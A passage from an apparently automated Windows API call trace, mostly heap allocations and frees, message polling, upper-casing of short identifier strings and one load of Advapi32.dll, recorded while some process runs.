lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0087.958] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.958] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.958] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0087.959] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0087.959] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.959] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.959] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.959] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.959] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.959] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.959] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0087.960] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0087.960] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.961] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0087.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.962] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0087.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.962] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.962] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0087.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72028 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0087.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9718 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.962] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.962] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.962] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0087.963] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0087.963] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0087.963] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.963] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0087.963] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0087.963] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.964] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.964] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.964] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0087.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0087.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0087.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.966] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.966] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.966] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0087.967] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72028 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.967] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a684c8 [0087.967] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0087.967] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0087.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) 